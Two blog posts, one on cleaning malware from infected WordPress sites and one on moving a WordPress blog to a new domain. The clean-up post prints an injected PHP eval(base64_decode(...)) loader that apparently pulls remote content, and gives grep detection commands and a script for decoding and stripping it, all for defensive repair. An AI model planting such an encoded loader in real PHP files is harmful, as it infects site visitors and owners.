
How to clean malware infected WordPress blogs

Yes, that happened to me. I had a pretty old version of WordPress for one website and it got attacked by somebody. From what I could tell it was an automated attack and it infected most of the .php files for the same user on the hosting.

I found out when I opened the website in Chrome and a warning was shown instead of the site:


Note: You can also perform a free scan via Sucuri which will confirm if your website is infected and it also offers ways to clean it up.

The following will be reported if infected:

Don’t panic, investigate!

The first thing I did was panic. After panicking for ~5 minutes I realized that I should calm down and start investigating the issue and how many of my websites were affected. I opened all of them in Chrome and only 3 were infected. I opened the page source to see what the code causing the problem looked like. Note: DO NOT OPEN THE INFECTED LINK, it will infect your machine (especially if you are on Windows).

The code was a URL to the malicious website enclosed in <script> tags. Nothing was shown in Firefox though, which is why I didn't see the problem earlier. I assume Firefox has some built-in protection against scripts loaded from external hosts.

The next step was to open the .php files on my server and find the code that was producing the script tag pointing to the external website. It was at the top of the file and it was a base64 encoded string, which looked like this:

/**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYJF9TRVJWRV
JbJ21yX25vJ10pKXsgICRfU0VSVkVSWydtcl9ubyddPTE7ICAgIGlmKCFmdW5jdGlvbkk5Y3VybF83
NzcoJHVybCk50ZW50IT09ZmFsc2UpcmV0dXJuICRjb250ZW50OyRjb250ZW50PUB0cnlmb3Blbl8Nz
coJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9zb2NrBlb
l83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9QHRy2tl
dF83NzcoJHVybCk7aWYoJbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7cmV0dXJuICgIGZ1bmNttr
0aW9uIHRyeWN1cmxKCR1cmwpe2lmKGZas1bmN0aW9uXsf2V4aXN0cygnY3Vybyk9PT1mYWxzZSlyZX
R1cm4gZmFsc2U7JGNoID0gYl0ICgpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVVJMLCR1cmwpO
2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpO2N1cmxfc2V0b3B0ICg
VUkxPUFRfVElNRU9VVCwgNSk7Y3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9IRUFERVIsIDApOyRyZ
XN1bHQgPSBjdXJsX2V4ZWMgKCRjaCk7Y3VybF9jbG9zZSgkY2gpO2lmICgkcmVzdWx0PT0iIilyZXR
1cm4gZmFsc2U7cmV0dXJuICRyZXN1bHQ7fSAgZnVuY3Rpb24gdHJ5ZmlsZV83NzcoJHVybCl7aWYoZ
nVuY3Rpb25fZXhpc3RzKCdmaWxlJyk9PT1mYWxzZSlyZXR1cm4gZmggsdaefhyjhEgsrrgmV0dXJuI
CRidWY7fSAgZnVuY3Rpb24gdHJ5Zm9wZW5fNzc3KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnZm9
wZW4nKT09PWZhsfaXJldHVybiBmYWxzZTskYndfsdyRmPUBmb3BlbigkdXJsLCdyJyk7aWYgK"));?>

If you are on a Linux machine or have Cygwin installed you can decode the string and see what it actually does by using the following command:

echo "ABOVE STRING GOES HERE" | base64 -d

echo is used so that the string is only printed and decoded, never executed by mistake.

Make backups

Now that we know what the issue is, make a backup of the website and the database. Don't worry that the files are still infected; better to have infected files than no files at all in case something terrible happens 🙂

Unless you already have some method to create frequent backups, use a simpler method now. Delete all the unwanted themes and plugins, empty the cache if you are using a caching plugin, then log in to your hosting (S/FTP) and copy all the files from your host to your local machine. Log in to your database and create a full export of your database.

Clean-up

Unless you got Sucuri to perform the cleaning for you, these are some manual steps you can perform to clean your website.

1. Install a plugin to scan

There is a plugin called Exploit Scanner to scan your WordPress installation. It works for WordPress 3.3+, so if you have something older you will need to skip this step. If you have 3.3+, you can install it and perform a scan (in most cases the default settings are good) which will inform you which files are (most likely) infected. There will be some legitimate decode/eval functions in the code, so you should just check for the ones that have base64 encoded strings (as explained above).

When the scan is completed you can see which files are infected and then correct them manually.

2. Manually scan all the files

If you are on a Linux machine or have Cygwin on Windows you can execute the following to identify which files are infected:

cd backedup_folder_from_above
find . -type f -name '*.php' -print0 | xargs -0 grep -il decode

This will print all the .php files that have the word decode in them, and you will be able to recognize the infection by its position at the top of the file and its base64 encoded string. If you are not sure about some files, you can always check the encoded string by using the echo method explained above.

3. Manually remove the infected code

Now that we have identified which files are infected (either by the plugin or the manual scan), it is time to clean up the website. Modify the infected files by deleting the malware lines, in the example above from /**/ up to the php after the encoded string. If you modify the local files on your computer, when you are finished you need to upload them to the server at the correct paths and overwrite the existing ones. An easier way is to open the files directly from the server (via your FTP client), modify them and save the changes.

When you are done with all the files and they are successfully uploaded to your server, perform another scan with Exploit Scanner and/or a manual scan (note: for this second scan you need to create a new backup of the entire website in a new location and scan there). Make sure there are no infected files left.
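The decode step and the manual clean-up above, scripted as an added example (this is not code from the original post): it lists the PHP files carrying the injected eval(base64_decode("...")) segment, decodes the payload for inspection without ever executing it, and writes a cleaned copy that removes exactly the span from /**/ through the ?><?php that reopens the original file. It assumes GNU grep/sed/base64 (Linux or Cygwin) and that the injected segment sits on one line, as it does in the wild (the post wraps it for display); the sample files it builds are constructed.

```shell
#!/bin/sh
# Added example (not code from the original post): list PHP files that carry
# the injected eval(base64_decode("...")) segment, show the decoded payload
# for inspection (printed only, never executed) and write a cleaned copy.
# Assumes GNU grep/sed/base64 (Linux or Cygwin) and that the injected segment
# sits on one line, as it does in the wild (the post wraps it for display).

B64='[A-Za-z0-9+/=]*'   # character class of a base64 string

# List PHP files under directory $1 that contain the eval(base64_decode( marker.
find_infected() {
    grep -rl --include='*.php' 'eval(base64_decode(' "$1" 2>/dev/null
}

# Print the decoded payload of file $1. Only sed and base64 touch the string,
# which is the post's 'echo ... | base64 -d' step done for you.
decode_payload() {
    sed -n "s|.*eval(base64_decode(\"\($B64\)\")).*|\1|p" "$1" | head -n 1 \
        | base64 -d 2>/dev/null
}

# Write a copy of $1 to $2 with the injected segment removed: from /**/ up to
# and including the '?><?php' that reopens the original file (the span the
# post says to delete), so the file's own opening <?php survives.
strip_payload() {
    sed "s|/\*\*/ *eval(base64_decode(\"$B64\"));* *?><?php||" "$1" > "$2"
}

# For every infected file under $1, print its path and the decoded payload.
scan_report() {
    find_infected "$1" | while IFS= read -r f; do
        printf '== %s ==\n' "$f"
        decode_payload "$f"
        printf '\n'
    done
}

# Build a constructed sample tree under $1: one injected and one clean file.
make_sample() {
    mkdir -p "$1/wp-content"
    payload=$(printf '%s' "echo 'constructed sample';" | base64 | tr -d '\n')
    printf '<?php /**/ eval(base64_decode("%s"));?><?php\n// plugin code\n' \
        "$payload" > "$1/wp-content/bad.php"
    printf '<?php\n// clean file\n' > "$1/wp-content/good.php"
}
# Usage: make_sample /tmp/wp-sample; scan_report /tmp/wp-sample
```

Run scan_report against the backup folder from the "Make backups" step, read each decoded payload, and only then run strip_payload per file and diff the result against the original before uploading it.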

Final steps

Now that the site is clean there are some final steps that must be performed so that you avoid problems like this in the future.

  1. Update your WordPress installation to the latest version
  2. Update all your plugins or at least the active ones
  3. Update your theme (please note, some themes when updated will overwrite all your custom code)
  4. Change your WordPress secret keys (get them here) in your wp-config.php file (more info here)
  5. Change the passwords for all the users in WordPress and make sure there are no new users created
  6. Change the password(s) on your database and change the password in wp-config.php as well
  7. Make sure the .htaccess file in the root directory of your blog has not been modified. Unless you have modified it, it should look like this
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress

Note: there could be something else added by your hosting, plugins etc., so double check before modifying it.

After you have done all these steps, go to Sucuri again and re-scan your site to make sure that everything is gone. If the site is clean you should see something like this:

That would be all, now go and write some posts on your clean blog 🙂

How to move your WordPress to a new domain name

As you might have noticed, there is a new domain name for this blog. Now the domain is http://redoem.com. It is easier to remember and shorter than the previous one (http://blog.zasekoj.com).

The whole process took approximately 45 minutes, but yours could vary depending on the amount of posts, comments, images etc that you have.

NOTE: this is not for blogs hosted on wordpress.com. For them many of the steps will be different, but you can try and adapt the following.

OK, enough chit-chat, let's get to work. First of all, of course, you need to buy a new domain name (I am using DreamHost – you can register for hosting as well and use coupon REDOEM30 to get 1 extra FREE lifetime domain registration and $30 off your total amount!).

  1. Create a new user in your panel (if the hosting does not do it automatically) which will have FTP access to your domain name.
  2. Remove all the junk that you do not need, like pending spam comments, drafts you are not planning to use, themes that you don't need etc. This takes additional space and there is no need to transfer it across databases.
  3. Disable all the WordPress plugins and empty the cache if you are using a caching plugin
  4. Export your database
    • Login to your MySQL server (phpMyAdmin) and click on the Export tab
    • Select your database on the left of the screen (do not select the information_schema database)
    • All of the default settings should be OK, unless you are an advanced user and you know what you are doing and what else you might need
    • Go to the bottom of the page and click the check box that says Save as file
    • Enter a template for your filename (the default is OK)
    • Leave the Compression set to None. It saves a few steps later
    • Click the Go button on the bottom-right and save the file to your disk
  5. Open the saved export file in a text editor which supports Find and Replace (like Notepad++, TextMate, GEdit etc)
  6. Find and replace all of the instances where your old domain name is used. NOTE: start with the longest string, for example db.olddomain.com would be replaced with db.newdomain.com, then go on to the next level by replacing olddomain.com with newdomain.com, and last just the bare name from olddomain to newdomain. Please be careful with this last one because it could change some things that you don't want changed. I recommend checking which instances they are and either replacing them one by one where needed or using extra filters. For example, when I was doing this last bit I replaced /home/olddomain/ with /home/newdomain/ because that worked for me; see if such options will work for you too.
  7. If you want to change the database name, at the top of the file there should be a statement like "CREATE DATABASE namehere ...." Change the name to whatever you want. Please note that you will need this name later.
  8. Save the file
  9. Login to your new MySQL Server (phpMyAdmin) for the new domain.
  10. Click Import and select the file that you modified. Click OK
  11. When the import is complete, you will receive a message stating that, if there are errors you will be informed as well. Now we will assume that it was successful.
  12. Log in via (S)FTP to your old domain where the WordPress installation is currently located
  13. Copy all the files (the wp-includes, wp-content and wp-admin folders as well) from olddomain.com to your local disk (recommended) or directly to the new domain (usually via SSH)
  14. Open the file wp-config.php in a text editor and modify the following fields:
    • define('DB_NAME', 'newdatabase');  — this is the name from step 7
    • define('DB_USER', 'newdatabaseuser');   — this is the user that you use to connect to the database/phpMyAdmin
    • define('DB_PASSWORD', 'newdbpass');  — this is the password that you use to connect to the database/phpMyAdmin
    • define('DB_HOST', 'db.newdomain.com');  — this is the hostname for the new database
  15. Transfer all the files to the newdomain.com folder
  16. Try to open the newdomain.com site — it should open successfully
  17. Reactivate all the plugins that you had previously, or only the ones that you want. Some of them might need to be re-configured to work on the new domain (SEO, Google Sitemap etc.)
  18. Change any custom code that you have, like Google Analytics, Adwords etc
  19. Create a new file called .htaccess (note the dot at the beginning and no extension) for a permanent redirect from the old site to the new site. This is important so that you don't lose any traffic. However, if you are giving up olddomain.com you cannot do this. Enter the following in it:
    Options +FollowSymLinks
    RewriteEngine on
    RewriteRule (.*) http://newdomain.com/$1 [R=301,L]
  20. Place the newly created file .htaccess inside the olddomain.com directory
  21. Remove all the files inside the olddomain.com directory (EXCEPT the .htaccess file that you added in step 20)
  22. Try the old site and see if the redirect works properly

Well, that was it. After all of these steps your WordPress installation should be moved to the new domain name and everything should stay the same. The redirect is very important (step 19) so make sure you keep your old domain for at least several more months after the move so that all the old traffic is redirected successfully. You can omit this step if you have a new site with very few visits, but then again I guess you can just create a new WordPress installation and do not perform the above steps 🙂

Enjoy and let me know in the comments if you have any problems.
